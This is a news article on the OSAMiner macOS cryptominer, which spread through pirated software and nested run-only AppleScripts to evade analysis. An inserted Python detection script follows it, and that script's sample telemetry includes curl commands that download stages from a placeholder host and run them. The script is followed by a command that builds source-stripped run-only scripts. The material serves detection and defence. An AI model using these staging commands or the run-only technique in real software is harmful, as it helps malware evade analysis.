https://www.zdnet.com/article/macos-malware-used-run-only-applescripts-to-avoid-detection-for-five-years/

macOS malware used run-only AppleScripts to avoid detection for five years

The macOS.OSAMiner has been active since 2015, primarily infecting users in Asia.

By Catalin Cimpanu for Zero Day | January 12, 2021 -- 14:53 GMT (06:53 PST) | Topic: Security

Image: Bundo Kim

For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.
Named OSAMiner, the malware has been distributed in the wild since at least 2015, disguised in pirated (cracked) games and software such as League of Legends and Microsoft Office for Mac, security firm SentinelOne said in a report published this week.

"OSAMiner has been active for a long time and has evolved in recent months," a SentinelOne spokesperson told ZDNet in an email interview on Monday.

"From what data we have it appears to be mostly targeted at Chinese/Asia-Pacific communities," the spokesperson added.

Nested run-only AppleScripts, for the win!

But the cryptominer did not go entirely unnoticed. SentinelOne said that two Chinese security firms spotted and analyzed older versions of OSAMiner in August and September 2018, respectively.

But their reports only scratched the surface of what OSAMiner was capable of, SentinelOne macOS malware researcher Phil Stokes said yesterday.

The primary reason was that security researchers weren't able to retrieve the malware's entire code at the time: the malware used nested run-only AppleScript files to retrieve its malicious code across several stages.

As users installed the pirated software, the booby-trapped installers would download and run a run-only AppleScript, which would download and run a second run-only AppleScript, which in turn would download and run a third and final run-only AppleScript.

Since run-only AppleScripts are distributed in compiled form with the source code stripped, so the script is not human-readable, each stage had to be captured at runtime before it could be analyzed, which made the job harder for security researchers.

Yesterday, Stokes published the full chain of this attack, along with indicators of compromise (IOCs) for past and newer OSAMiner campaigns.
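The stage chain described above defeats static inspection because each stage ships as run-only (compiled, source-stripped) AppleScript, so the practical check is to hunt for the behaviour rather than the script bodies: an installer spawning osascript on a compiled .scpt, which downloads and runs another .scpt, and so on. The following Python script is an added example, not code from the article or from SentinelOne's report. It runs over a constructed sample of process-execution events; the event layout, pids, paths and hostnames are assumptions made for illustration.

```python
"""Hunt for nested run-only AppleScript stages in process telemetry.

Added example for this article; it is not code from ZDNet or SentinelOne.
Event layout, pids, paths and hostnames below are constructed assumptions.
"""
from collections import defaultdict

# Constructed sample telemetry: (pid, ppid, process name, command-line args).
# pids 100-106 model the chain described in the article: a cracked-app
# installer runs stage 1, which fetches and runs stage 2, which fetches and
# runs stage 3. pids 200-201 are benign noise (a user-run compiled script).
SAMPLE_EVENTS = [
    (100, 1,   "Installer", "/Volumes/CrackedApp/Install.pkg"),
    (101, 100, "curl",      "-s http://stage.invalid/1 -o /tmp/a.scpt"),
    (102, 100, "osascript", "/tmp/a.scpt"),
    (103, 102, "curl",      "-s http://stage.invalid/2 -o /tmp/b.scpt"),
    (104, 102, "osascript", "/tmp/b.scpt"),
    (105, 104, "curl",      "-s http://stage.invalid/3 -o /tmp/c.scpt"),
    (106, 104, "osascript", "/tmp/c.scpt"),
    (200, 1,   "Terminal",  ""),
    (201, 200, "osascript", "/Users/alice/Library/Scripts/backup.scpt"),
]

# Locations a dropped stage is likely to be written to (assumed list).
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")


def script_path(event):
    """Return the compiled-script (.scpt) argument of an osascript event, else None."""
    _pid, _ppid, name, args = event
    if name != "osascript":
        return None
    for tok in args.split():
        if tok.endswith(".scpt"):
            return tok
    return None


def build_index(events):
    """Index events by pid and build a parent -> children map."""
    by_pid = {e[0]: e for e in events}
    children = defaultdict(list)
    for pid, ppid, _name, _args in events:
        children[ppid].append(pid)
    return by_pid, children


def has_script_ancestor(pid, by_pid):
    """True if any ancestor of pid is itself an osascript run of a .scpt."""
    ppid = by_pid[pid][1]
    while ppid in by_pid:
        if script_path(by_pid[ppid]):
            return True
        ppid = by_pid[ppid][1]
    return False


def longest_chain(pid, by_pid, children):
    """Longest sequence of nested .scpt runs rooted at pid (inclusive).

    Non-osascript intermediaries (sh, curl) are walked through but not counted.
    """
    own = [script_path(by_pid[pid])] if script_path(by_pid[pid]) else []
    best = []
    for child in children.get(pid, []):
        sub = longest_chain(child, by_pid, children)
        if len(sub) > len(best):
            best = sub
    return own + best


def find_stage_chains(events, min_stages=2):
    """Report chains of nested osascript .scpt executions with >= min_stages stages.

    Each finding records the root osascript pid, the process that launched it,
    the ordered script paths, and whether any stage ran from a temp location.
    """
    by_pid, children = build_index(events)
    findings = []
    for event in events:
        pid, ppid = event[0], event[1]
        if not script_path(event) or has_script_ancestor(pid, by_pid):
            continue  # only chain roots; deeper stages are covered by their root
        chain = longest_chain(pid, by_pid, children)
        if len(chain) < min_stages:
            continue
        parent = by_pid.get(ppid)
        findings.append({
            "root_pid": pid,
            "launched_by": parent[2] if parent else None,
            "stages": chain,
            "from_temp": any(p.startswith(TEMP_PREFIXES) for p in chain),
        })
    return findings


if __name__ == "__main__":
    for f in find_stage_chains(SAMPLE_EVENTS):
        print(f"pid {f['root_pid']} launched by {f['launched_by']}: "
              f"{len(f['stages'])} nested stages {f['stages']} temp={f['from_temp']}")
```

On a real Mac the events would come from an EDR or from Endpoint Security process-exec telemetry; the point is that nesting depth, parent process and drop location stay visible to the defender even when the script bodies do not. To reproduce the anti-analysis property itself, `osacompile -x -o out.scpt in.applescript` builds a run-only script and `osadecompile out.scpt` cannot recover its source.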
Stokes and the SentinelOne team hope that by finally cracking the mystery surrounding this campaign and by publishing IOCs, other macOS security software providers will now be able to detect OSAMiner attacks and help protect macOS users.

"Run-only AppleScripts are surprisingly rare in the macOS malware world, but both the longevity of and the lack of attention to the macOS.OSAMiner campaign, which has likely been running for at least 5 years, shows exactly how powerful run-only AppleScripts can be for evasion and anti-analysis," Stokes concluded in his report yesterday.

"In this case, we have not seen the actor use any of the more powerful features of AppleScript that we've discussed elsewhere [1, 2], but that is an attack vector that remains wide open and which many defensive tools are not equipped to handle."

The IOCs are available in the SentinelOne OSAMiner report.